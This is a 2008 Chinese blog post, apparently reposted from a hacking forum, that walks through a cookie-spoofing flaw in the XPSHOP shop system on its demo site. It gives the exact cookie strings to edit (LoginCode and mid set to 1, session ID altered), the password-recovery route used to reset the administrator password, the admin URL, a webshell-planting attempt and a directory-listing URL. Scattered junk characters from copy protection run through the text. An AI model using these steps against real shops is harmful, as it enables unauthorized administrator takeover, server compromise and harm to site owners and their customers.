空间管理您的位置: IXPUB技术博客 » 妖界之箭欢迎您(CHINA *009) » 日志

XPSHOP商城系统Cookies欺骗漏洞

上一篇 / 下一篇 2008-11-10 07:57:08

文章作者：121711090
O_t ^/Kc$e0信息来源：邪恶八进制信息安全团队（www.eviloctal.com）IXPUB技术博客"HT!X.n%IVQUi

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
vsOD#[v0d0这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
)Iv8Kg1v!p6D0但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:http://demo1.xpshop.cn/IXPUB技术博客m%KY'T/`)WD3oV
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704IXPUB技术博客 j-?2[XPXT3]8~

好..还是用啊D打开网站比较好..看截图:记得要保留cookies
&Kwu[EN8Ir9e0IXPUB技术博客^e!z*ZJ`!Y/wT:Q
IXPUB技术博客B}T5k[
之后便看看他的Cookies...
&b#H5L5|!q*Ce0
c kT"Jl9V&^0代码:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

['wI[%Y0我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1 :

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

W@Ti'h sw0点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..IXPUB技术博客rC7h,mS

之后就成这样了:IXPUB技术博客+I{(wMMr

{ tsvB'VsU0当然..也有可能没有..那我们就要改一下:"ASP.NET_SessionId=" 这个值就好了..随便改一个字就行:如下:

代码:IXPUB技术博客f` SRrtN

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

d$p2e9K5v-[#N Oi C/?0好了..现在再看看会员信息:IXPUB技术博客4Z3E`5j-HN
是不是有一个"找回密码答案："呵.....个位都想到了吧..直接就能改管理员密码了..IXPUB技术博客\2Lr:`:\/q
http://demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..IXPUB技术博客,a3lT5|'x
如下图:
*g'R.e}yrS"]?Z0
(WvXZf R i0成功.....http://demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..IXPUB技术博客]f)|%~l3ff8W
可是我一直没弄成..理论是只有这样才行..看..
DLB h#Www0IXPUB技术博客P_7`)W d8hM)f
先插马..再备份..但这里出错了..
/Y\rv7O-|0还望达人能想出更好的办法..IXPUB技术博客C'zRD7ZpI
我想了一晚上了....没辙了....
)u"NEA.n5]%Ef#d0http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录IXPUB技术博客1x0JuA,Ck%@*nH2^L